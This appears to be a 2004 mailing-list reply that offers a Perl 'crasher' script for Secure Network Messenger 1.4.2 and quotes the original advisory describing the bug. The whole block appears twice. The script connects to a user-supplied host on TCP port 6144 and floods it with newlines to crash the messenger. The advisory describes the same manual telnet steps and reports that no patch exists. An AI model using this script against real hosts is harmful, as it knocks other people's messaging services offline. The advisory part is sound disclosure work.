use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
Proto => "tcp",
PeerPort => "6144",
PeerAddr => "$h"
) or die "\nNo response from host.";
sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;
Greetz, clearscreen :)
----- Original Message -----
From: "Luigi Auriemma" <aluigi (at) autistici (dot) org [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <bugs (at) securitytracker (dot) com [email concealed]>;
<news (at) securiteam (dot) com [email concealed]>; <full-disclosure (at) lists.netsys (dot) com [email concealed]>;
<vuln (at) secunia (dot) com [email concealed]>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2
>
> #######################################################################
>
> Luigi Auriemma
>
> Application: Secure Network Messenger
> http://www.networkmessengers.com/msg/
> Versions: <= 1.4.2
> Platforms: Windows
> Bug: crash
> Exploitation: remote
> Date: 12 November 2004
> Author: Luigi Auriemma
> e-mail: aluigi (at) altervista (dot) org [email concealed]
> web: http://aluigi.altervista.org
>
>
> #######################################################################
>
>
> 1) Introduction
> 2) Bug
> 3) The Code
> 4) Fix
>
>
> #######################################################################
>
> ===============
> 1) Introduction
> ===============
>
>
> Secure Network Messenger is a LAN messenger for Windows for exchanging
> encrypted messages and files.
>
>
> #######################################################################
>
> ======
> 2) Bug
> ======
>
>
> Is possible to crash the program sending malformed data.
>
>
> #######################################################################
>
> ===========
> 3) The Code
> ===========
>
>
> Launch a telnet client and connect to the victim host on port 6144.
> Now press RETURN about 10 times or more.
> Disconnect, reconnect again and press RETURN.
> The remote host should be crashed.
>
>
> #######################################################################
>
> ======
> 4) Fix
> ======
>
>
> No fix.
> Over one month ago the developers said that they had to fix this bug
> soon... no patch has been released yet.
>
>
> #######################################################################
>
>
> ---
> Luigi Auriemma
> http://aluigi.altervista.org
>
#!/usr/bin/perl
use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
Proto => "tcp",
PeerPort => "6144",
PeerAddr => "$h"
) or die "\nNo response from host.";
sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;
Greetz, clearscreen :)
----- Original Message -----
From: "Luigi Auriemma" <aluigi (at) autistici (dot) org [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <bugs (at) securitytracker (dot) com [email concealed]>;
<news (at) securiteam (dot) com [email concealed]>; <full-disclosure (at) lists.netsys (dot) com [email concealed]>;
<vuln (at) secunia (dot) com [email concealed]>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2
>
> #######################################################################
>
> Luigi Auriemma
>
> Application: Secure Network Messenger
> http://www.networkmessengers.com/msg/
> Versions: <= 1.4.2
> Platforms: Windows
> Bug: crash
> Exploitation: remote
> Date: 12 November 2004
> Author: Luigi Auriemma
> e-mail: aluigi (at) altervista (dot) org [email concealed]
> web: http://aluigi.altervista.org
>
>
> #######################################################################
>
>
> 1) Introduction
> 2) Bug
> 3) The Code
> 4) Fix
>
>
> #######################################################################
>
> ===============
> 1) Introduction
> ===============
>
>
> Secure Network Messenger is a LAN messenger for Windows for exchanging
> encrypted messages and files.
>
>
> #######################################################################
>
> ======
> 2) Bug
> ======
>
>
> Is possible to crash the program sending malformed data.
>
>
> #######################################################################
>
> ===========
> 3) The Code
> ===========
>
>
> Launch a telnet client and connect to the victim host on port 6144.
> Now press RETURN about 10 times or more.
> Disconnect, reconnect again and press RETURN.
> The remote host should be crashed.
>
>
> #######################################################################
>
> ======
> 4) Fix
> ======
>
>
> No fix.
> Over one month ago the developers said that they had to fix this bug
> soon... no patch has been released yet.
>
>
> #######################################################################
>
>
> ---
> Luigi Auriemma
> http://aluigi.altervista.org
>
[ reply ]